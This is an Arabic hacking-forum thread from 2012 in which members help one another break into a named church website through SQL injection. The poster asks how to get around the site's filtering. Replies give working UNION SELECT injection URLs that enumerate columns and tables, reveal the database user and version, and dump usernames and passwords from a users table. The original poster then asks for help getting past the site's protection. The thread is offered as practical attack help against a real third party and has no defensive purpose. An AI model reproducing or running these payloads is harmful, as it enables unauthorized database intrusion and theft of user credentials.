التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 03-10-2012, 07:21 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية DBZ
 

 

 
إحصائية العضو






DBZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DBZ is on a distinguished road

سؤال مجاب: about SQL injection


http://hopelutherancranberry.org/readnews.php?id=199


هذا الموقع فيه فلترة كبيره تجاوزت البعض و فشلت في البعض
حاولت بكل الشرحات و ما فيها اي حل
هاي الخطوات الي تفاديتها :
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=199'/*!UNION SELECT*/ 1,2,3,/*!group_concat*/(table_name),5,6,7 from information_schema.tables-- - 
لما بجي انفذ امر استعلام الجداول يعطيني فوردبيدن
و لما استخدم دا الامر :
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=199'/*!UNION SELECT*/ 1,2,3,/*!concat*/(column_name,0x3a,table_name,0x3a,table_schema),5,6,7 from information_schema.columns-- - 
الاستعلام مافيه فوربيدن و لكن ما يخرج لي اي معلومات و الله غريب
شو النتيجه :
كود:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/hope/public_html/readnews.php on line 78
كانه خطا في الاستعلام، و انا اضنه ذا الاستعلام صحيح 100%
لا فيه احد الطلاب هنا محترف حقن يفيدنا و اجركم على الله

سلام عليكم



Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC about SQL injection

التوقيع

http://data0.eklablog.com/puissance-...e641555_12.gif

و قل ربي زدني علما

 

   

رد مع اقتباس
أفضل جواب - كتبه aircrack -ng
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,4,5,6,7-- - 
الاعمده المصابه 4 و6

اصدار القاعده 5
hope_hope@localhost : hope_hope : 5.0.95-community

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7-- - 
الجداول

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,table_name,5,6,7+from+information_schema. tables-- - 
الحقنه
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),name,pass),5,6,7++from+thyme_Users-- - 
قديم 03-11-2012, 01:18 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية DBZ
 

 

 
إحصائية العضو






DBZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DBZ is on a distinguished road

افتراضي رد: about SQL injection


ياه و لا واحد ............

التوقيع

http://data0.eklablog.com/puissance-...e641555_12.gif

و قل ربي زدني علما

 

   

رد مع اقتباس
قديم 03-13-2012, 03:01 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
Dr.Unkn0wn
.:: لا إله إلا الله محمد رسول الله ::.
 
الصورة الرمزية Dr.Unkn0wn
 

 

 
إحصائية العضو






Dr.Unkn0wn غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.Unkn0wn is on a distinguished road

افتراضي رد: about SQL injection


Try This

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199/*!UNION%20SELECT*/%201,2,3,/*!concat*/(column_name,0x3a,table_name,0x3a,table_schema),5,6,7%20from%20information_schema.columns-- 

   

رد مع اقتباس
قديم 03-13-2012, 06:22 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي رد: about SQL injection


كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,4,5,6,7-- - 
الاعمده المصابه 4 و6

اصدار القاعده 5
hope_hope@localhost : hope_hope : 5.0.95-community

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7-- - 
الجداول

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,table_name,5,6,7+from+information_schema. tables-- - 
الحقنه
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),name,pass),5,6,7++from+thyme_Users-- - 
التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 


التعديل الأخير تم بواسطة aircrack -ng ; 03-13-2012 الساعة 06:30 PM.

   

رد مع اقتباس
قديم 03-18-2012, 02:26 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية DBZ
 

 

 
إحصائية العضو






DBZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DBZ is on a distinguished road

افتراضي رد: about SQL injection


Thank's aircrack-ng
بس يا ليت شرح لكيفيه تخطي حماية ذاك الموقع
و بارك الله فيك يا غلا

التوقيع

http://data0.eklablog.com/puissance-...e641555_12.gif

و قل ربي زدني علما

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 12:49 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0